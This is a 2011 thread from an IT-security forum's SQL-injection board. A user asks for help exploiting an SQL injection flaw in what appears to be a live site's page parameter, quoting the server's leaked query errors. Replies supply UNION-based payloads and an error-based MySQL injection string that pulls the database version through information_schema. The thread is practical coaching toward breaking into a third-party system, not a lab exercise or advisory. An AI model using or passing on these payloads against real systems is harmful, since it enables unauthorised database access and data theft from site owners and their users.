 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 199
 Members: 0
 Total: 199
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Problem SQLi |
|
 Posted: Wed Aug 03, 2011 9:41 am |
 |
|
| AleisterCrow |
| Beginner |
 |
|
| Joined: Aug 03, 2011 |
| Posts: 2 |
|
|
|
 |
|
 |
|
hi guys,
i'm trying to explore a sql injection vulnerability but i'm having some problems.
default.php?p_secao=65 order by 1 /* --> no error
default.php?p_secao=65 order by 2 /* --> error:
ERROR: Could not execute MySQL query. Query: 'SELECT sec_arquivo FROM SECOES WHERE PROJETOS_proj_codigo = 174 AND sec_codigo = 65 order by 2 /*'Unknown column '2' in 'order clause'
ok, so the tabble has just one column right ?
but when i try to do this:
default.php?p_secao=65 union select null /* --> error
ERROR: Could not execute MySQL query. Query: 'select sec_nome, SECOES_sec_codigo from SECOES where sec_codigo = 65 union select null /* and PROJETOS_proj_codigo = 174'The used SELECT statements have a different number of columns
why am i getting this error ?
cheers |
|
|
|
|
| Posted: Mon Aug 08, 2011 4:13 pm |
|
|
| RubberDoll |
| Active user |
 |
|
| Joined: Jun 04, 2009 |
| Posts: 46 |
|
|
|
|
|
|
|
Why UNION select NULL?
-65 union ALL select 1/* |
|
|
|
|
| Posted: Tue Aug 23, 2011 9:26 am |
|
|
| AleisterCrow |
| Beginner |
|
|
| Joined: Aug 03, 2011 |
| Posts: 2 |
|
|
|
|
|
|
|
because the NULL value can be converted to any other data type, avoiding errors caused by different data types in the same column.
I tried to use
-65 union ALL select 1/*
but it didin't works as well.
ERROR: Could not execute MySQL query. Query: 'select sec_nome, SECOES_sec_codigo from SECOES where sec_codigo = 65 union ALL select 1/* and PROJETOS_proj_codigo = 174'The used SELECT statements have a different number of columns
I'm not that sure that ' /* ' is doing what it was supossed to do.
any idea ? |
|
|
|
|
| Posted: Wed Aug 31, 2011 1:43 pm |
|
|
| pink_spider |
| Advanced user |
 |
|
| Joined: Aug 28, 2010 |
| Posts: 91 |
|
|
|
|
|
|
|
It is 'Error based Sql injection' (inband)
Try error based syntaxes for sqli suksses xD
| Code: | default.asp?id=(1)and(select 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from
information_schema.tables group by x)a))-- |
^^ |
|
_________________
Pink_spider (: - Sophia Hacker Group 2009-2011 |
|
|
|
| Posted: Thu Sep 15, 2011 5:23 pm |
|
|
| sk8er |
| Advanced user |
|
|
| Joined: May 09, 2005 |
| Posts: 64 |
|
|
|
|
|
|
|
you should trie with clausule "HAVING" form more results  |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
